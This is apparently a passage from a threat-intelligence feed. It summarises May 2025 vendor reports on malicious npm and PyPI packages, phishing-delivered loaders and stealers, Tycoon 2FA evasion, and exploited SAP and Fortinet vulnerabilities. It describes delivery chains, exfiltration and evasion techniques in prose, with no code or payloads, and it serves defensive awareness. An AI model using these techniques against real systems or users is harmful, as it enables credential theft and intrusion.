- Researchers at Socket have discovered a malicious npm package, koishi-plugin-pinhaofa, designed to exfiltrate data from Koishi chatbots. Marketed as a spelling auto-correct helper, the plugin, once installed, silently scans all chatbot messages for any eight-character hexadecimal string. Upon finding such a string, which could represent sensitive data like commit hashes, API tokens, or checksums, the plugin forwards the entire message content to a hardcoded QQ account (UIN: 1821181277) controlled by the threat actor, who uses the npm alias kuminfennel. This exposes any secrets or credentials embedded within or surrounding the trigger string. This activity represents a supply chain attack targeting chatbot frameworks, exploiting the trust developers place in community plugins and the unrestricted access these plugins often have within the bot process.
PyPI_Backdoor_Targets_Developers
LOW
+
—
- Intel Source:
- Reversinglabs
- Intel Name:
- PyPI_Backdoor_Targets_Developers
- Date of Scan:
- 2025-05-21
- Impact:
- LOW
- Summary:
- Researchers at ReversingLabs have uncovered a malicious Python package called "dbgpkg" on the PyPI repository disguised as debugging tool. Once installed by developers, it deploy a backdoor that allow attackers to execute malicious code and exfiltrate sensitive data. The malware uses Python function wrappers on the requests and socket modules to run its code in the background that downloads a public key from Pastebin and uses a tool called Global Socket Tool to bypass firewalls and connect to the attacker’s server. This campaign is believed to be linked to Phoenix Hyena/DumpForums which has been targeting Russian interests in support of Ukraine since 2022.
DBatLoader_Targeting_Turkish_Users
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- DBatLoader_Targeting_Turkish_Users
- Date of Scan:
- 2025-05-21
- Impact:
- LOW
- Summary:
- ASEC researchers have identified a phishing campaign targeting Turkish users with malware known as DbatLoader also called ModiLoader. The attackers send phishing emails in the Turkish language, impersonating bank transaction notification which contain a malicious RAR file with BAT script. This initial BAT scripts executes DBatLoader which then leverages a series of obfuscated batch scripts and legitimate Windows tool to hide its activity and bypass security systems to install SnakeKeylogger. This malware steals system information, keyboard input and clipboard data and send stolen data to attackers Telegram’s C2 server.
Evolution_of_Tycoon_2FA_Defense_Evasion_Mechanisms
MEDIUM
+
—
- Intel Source:
- Any.Run
- Intel Name:
- Evolution_of_Tycoon_2FA_Defense_Evasion_Mechanisms
- Date of Scan:
- 2025-05-20
- Impact:
- MEDIUM
- Summary:
- ANY.RUN researchers have analyzed the Tycoon 2FA Phishing-as-a-Service (PhaaS) platform, active since August 2023 and targeting Microsoft 365 and Gmail credentials, has demonstrated continuous evolution in its anti-detection mechanisms. This AiTM phishing kit employs a multi-stage attack, starting with obfuscated JavaScript on a landing page, which performs several checks ("nomatch" decoy, domain comparison) before proceeding. It then uses Cloudflare Turnstile CAPTCHA (or other CAPTCHA services like reCAPTCHA and IconCaptcha in later variants) and C2 server queries to validate the user before delivering the core phishing content. Later stages involve further Base64/XOR obfuscation, encrypted payload delivery, and dynamic URL generation for data exfiltration to a C2 infrastructure often using .ru, .es, .su, .com, and .net TLDs. Notable new evasion techniques observed between December 2024 and May 2025 include debugger timing checks, debug environment detection (Selenium, PhantomJS), keystroke interception, context menu blocking, dynamic multimedia loading from legitimate CDNs for victim-tailored lures, invisible JavaScript obfuscation, custom fake page redirects, custom CAPTCHAs, browser fingerprinting, and AES encryption for payload obfuscation.
China_Nexus_State_Actors_Exploiting_SAP_Vulnerability
MEDIUM
+
—
- Intel Source:
- EclecticIQ
- Intel Name:
- China_Nexus_State_Actors_Exploiting_SAP_Vulnerability
- Date of Scan:
- 2025-05-20
- Impact:
- MEDIUM
- Summary:
- EclecticIQ researchers have uncovered that China-nexus state sponsered groups such as UNC5221, UNC5174 and CL-STA-0048 exploitating an unauthenticated file upload vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer.The threat actor leverging remote code execution to deploy malicious webshells, enabling command execution, install additional payloads like KrustyLoader and the SNOWLIGHT RAT. They are targeting government and essential service organizations in the UK, US and Saudi Arabia, aiming to compromise critical infrastructure, exfiltrate sensitive data, and maintain persistent.
FrigidStealer_Malware
LOW
+
—
- Intel Source:
- Wazuh
- Intel Name:
- FrigidStealer_Malware
- Date of Scan:
- 2025-05-20
- Impact:
- LOW
- Summary:
- Wazuh researchers have uncovered a new information stealing malware named FrigidStealer targeting macOS users since January 2025 and potentially linked to EvilCorp syndicate. It is being distributed through fake browser updates pages on compromised websites, tricking users into downloading a malicious disk image. Upon execution, the malware asks for the user’s password by leveraging a pop-up through apple scripts to bypass the macOS Gatekeeper and then register itself as an application and ensures it runs every time the system starts. FrigidStealer exfiltrates sensitive data including browser credentials, files, system information, and cryptocurrency wallet details and secretly sends it to a remote server using DNS tunneling. It terminates its own process to evade detection.
PowerShell_Loader_Executes_Remcos_RAT
LOW
+
—
- Intel Source:
- Qualys
- Intel Name:
- PowerShell_Loader_Executes_Remcos_RAT
- Date of Scan:
- 2025-05-20
- Impact:
- LOW
- Summary:
- Qualys Researchers have identified a new PowerShell based shellcode loader that filelessly loads and executes a variant of Remcos RAT. The attackers deliver this malware inside ZIP that contain malicious LNK files disguised as office document. When user open this file. It triggers an HTA file using mshta.exe which then download and executes obfuscated PowerShell code that runs directly in the system’s memory. It leverages Windows functions to load a Remcos RAT variant known as K-Loader. This variant has extensive capabilities including keylogging, screen capture, clipboard access, UAC bypass, and process hollowing for evasion.
Earth_Ammit_Targets_Drone_Supply_Chain
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Earth_Ammit_Targets_Drone_Supply_Chain
- Date of Scan:
- 2025-05-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Trend Micro have discovered that the Chinese-speaking threat group Earth Ammit undertook two synchronized multi-wave campaigns VENOM and TIDRONE between 2023 and 2024, with the goal of disrupting drone supply chains and compromising high-value targets in Taiwan and South Korea. The VENOM campaign targeted software service providers with open-source tools for stealth and low cost, but the subsequent TIDRONE campaign targeted the military industry with custom-built malware such as CXCLNT and CLNTEND for cyberespionage.
Ransomware_Hits_Financial_Firms
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Ransomware_Hits_Financial_Firms
- Date of Scan:
- 2025-05-19
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified a rise in cyber threats targeting financial institutions in Korea and around the world in April 2025. The research focuses on phishing and malware efforts, providing thorough insights into the top ten malware families and compromised Korean account data circulating on Telegram. A unique occurrence occurred when a threat actor, B_ose, sold over 1,700 stolen credit and debit card details on the Exploit forum, with 80% possibly valid and carrying sensitive information such as CVV numbers and addresses.
APT36_and_Hacktivists_Targeting_India
HIGH
+
—
- Intel Source:
- CyberProof
- Intel Name:
- APT36_and_Hacktivists_Targeting_India
- Date of Scan:
- 2025-05-19
- Impact:
- HIGH
- Summary:
- Researchers at CyberProof have observed a surge in cyber-attacks targeting Indian systems, coinciding with heightened geopolitical tensions following a terrorist attack in Baisaran Valley on April 22, 2025. The Pakistan-linked APT36 (Transparent Tribe) has been observed targeting Indian government and defense offices with phishing URLs and their known Crimson RAT, a tool capable of extensive information theft and voice recording. Simultaneously, hacktivist groups including 'Cyber Group HOAX1337', 'IOK Hacker', and 'National Cyber Crew' have reportedly targeted Indian educational institutes. Lures used by APT36 include malicious PDF files and macro-embedded XLSM documents, often themed around official Indian government or military communications, such as those impersonating Jammu & Kashmir Police or the Indian Air Force. One identified PowerPoint (PPAM) file, "Report & Update Regarding Pahalgam Terror Attack.ppam," contained a malicious macro consistent with older APT36 droppers, designed to deploy Crimson RAT.
Analysis_of_APT_C_51_Recent_Attacks
MEDIUM
+
—
- Intel Source:
- 360 Threat Intelligence Center
- Intel Name:
- Analysis_of_APT_C_51_Recent_Attacks
- Date of Scan:
- 2025-05-18
- Impact:
- MEDIUM
- Summary:
- The 360 Advanced Threat Research Institute reported, that APT-C-51 (also known as APT35, Charming Kitten), an actor motivated by political and economic interests, conducted an espionage campaign targeting the Middle East. The attack, observed around January 2025, initiated with LNK files (Biography of Mr.leehu hacohn.lnk) that, upon execution, released a decoy PDF and a compressed archive (osf.zip). This archive contained multiple DLLs, including the malicious Wow.dll, which performed environment checks and decrypted a gclib file using AES (key: {}nj45kdada0slfk) to obtain a PowerShell script. This script was then executed by new.dll, leading to the deployment of the PowerLess Trojan (version: 3.3.4).
Technical_Investigation_of_TransferLoader
LOW
+
—
- Intel Source:
- Zscaler
- Intel Name:
- Technical_Investigation_of_TransferLoader
- Date of Scan:
- 2025-05-18
- Impact:
- LOW
- Summary:
- Researchers at Zscaler have analyzed a new malware loader named TransferLoader, active since at least February 2025. This loader, observed deploying Morpheus ransomware at an American law firm, contains multiple embedded components: a downloader, a backdoor, and a specialized loader for the backdoor. All components utilize anti-analysis techniques such as PEB debugging checks, dynamic API resolution via hashing, junk code insertion, and runtime string decryption using unique 8-byte XOR keys. The backdoor module communicates with its C2 server via HTTPS or raw TCP, using custom packet structures and a stream cipher for encryption, and notably employs the InterPlanetary File System (IPFS) as a decentralized fallback mechanism for C2 updates. The shared code similarities and evasion methods across TransferLoader components suggest a common developer.
Adwind_RAT_Targets_Italy_via_PDF_Spear_Phishing
MEDIUM
+
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Adwind_RAT_Targets_Italy_via_PDF_Spear_Phishing
- Date of Scan:
- 2025-05-18
- Impact:
- MEDIUM
- Summary:
- CERT-AGID researchers have identified a large-scale Adwind RAT distribution campaign targeting Italy, Spain, and Portugal, corroborating earlier findings by Fortinet. The attackers employ spear-phishing emails with PDF attachments (Document.pdf, Invoice.pdf) that contain links to cloud storage services like OneDrive or Dropbox. These links lead to the download of an obfuscated VBS or HTML file, which, once deobfuscated, downloads a decoy PDF from Google Drive and, in parallel, a ~90MB ZIP archive from a URL. Unlike previous Adwind campaigns that directly dropped JAR files, this variant delivers a ZIP package containing both the necessary Java environment and the Adwind JAR file disguised as a PNG image (InvoiceXpress.png). This JAR is executed via a CMD script (InvoiceXpress.cmd). The Adwind configuration, encrypted with AES in ECB mode, points to a C2 subdomain on port 4414, consistent with previous Adwind infrastructure.
Ransomware_Groups_Exploiting_SAP_Vulnerability
LOW
+
—
- Intel Source:
- Reliaquest
- Intel Name:
- Ransomware_Groups_Exploiting_SAP_Vulnerability
- Date of Scan:
- 2025-05-17
- Impact:
- LOW
- Summary:
- Reliaquest researchers have uncovered that the Russian ransomware group called BianLian and the operators of the RansomEXX also known as Storm-2460 are exploiting the vulnerability CVE-2025-31324 in SAP NetWeaver Visual Composer. This vulnerability allows attackers remote code execution to upload and run malicious files without aunthentication. The attackers leverage this vulnerability to upload malicious JSP webshells to gain initial access and then deploy post-exploitation tools like Brute Ratel and Heaven's Gate for command-and-control, evasion and further compromise.
FortiVoice_Zero_Day_RCE_Exploited
LOW
+
—
- Intel Source:
- Truesec
- Intel Name:
- FortiVoice_Zero_Day_RCE_Exploited
- Date of Scan:
- 2025-05-17
- Impact:
- LOW
- Summary:
- Researchers at Truesec have discovered that CVE-2025-32756, a zero-day stack-based buffer overflow vulnerability in Fortinet products, has been extensively exploited in the field. The vulnerability affects FortiVoice, FortiRecorder, FortiMail, FortiNDR, and FortiCamer, allowing remote, unauthenticated attackers to execute arbitrary commands via specially crafted HTTP requests with a modified hash cookie.
PyInstaller_Malware_on_MacOS_Users
LOW
+
—
- Intel Source:
- Jamf Threat Labs
- Intel Name:
- PyInstaller_Malware_on_MacOS_Users
- Date of Scan:
- 2025-05-16
- Impact:
- LOW
- Summary:
- Jamf Threat Labs uncovered a new infostealer targeting macOS users. It is delivered through PyInstaller, a legitimate tool that converts Python scripts into Mach-O executable. This technique allow attackers to execute malicious Python payloads without requiring a Python installation on the system which is important because Apple no longer includes Python by default. The malware named stl installer and sosorry leverages fake password prompts to trick users into giving up their credentials. It can also run additional malicious AppleScript commands from a remote server, steal saved passwords and other sensitive information from the macOS Keychain and search for cryptocurrency wallets to exfiltrate private keys.
Devices_Hit_by_Stack_Overflow
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Devices_Hit_by_Stack_Overflow
- Date of Scan:
- 2025-05-16
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have discovered a stack-based buffer overflow vulnerability (CWE-121) in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products that could allow a remote unauthenticated attacker to execute arbitrary code or commands using specially crafted HTTP requests. Notably, this vulnerability has been extensively exploited in the wild, specifically targeting FortiVoice devices.
DarkCloud_Stealer
LOW
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- DarkCloud_Stealer
- Date of Scan:
- 2025-05-16
- Impact:
- LOW
- Summary:
- Palo Alto researchers have discovered a new data-stealing malware called DarkCloud Stealer which has been active since 2022. It is distributed primarily through phishing emails that contain malicious RAR file or a PDF designed to trick users into downloading the RAR from a file-sharing site. The archive contains an AutoIt-compiled executable which unpacks and executes the final payload called DarkCloud Stealer. This stealer is capable of harvesting a wide range of sensitive data, including browser and email credentials, FTP details, contact lists, system details and screenshots. It has been targeting multiple industries such as finance, manufacturing, Media and Entertainment and government with a particular focus on U.S. and Brazil.
PyPI_Packages_Targets_Solana_Developers
LOW
+
—
- Intel Source:
- Reversinglabs
- Intel Name:
- PyPI_Packages_Targets_Solana_Developers
- Date of Scan:
- 2025-05-16
- Impact:
- LOW
- Summary:
- Researchers at ReversingLabs have discovered malicious Python package called solana-token on the PyPI repository. It specifically targets Solana blockchain developers to steal source code and developer secrets. This package masquerading as a legitimate tool for Solana blockchain but secretly sends Python files and their contents to a hardcoded IP address. The solana-token package, downloaded over 600 times and even reused the name of an earlier malicious package before it was removed.
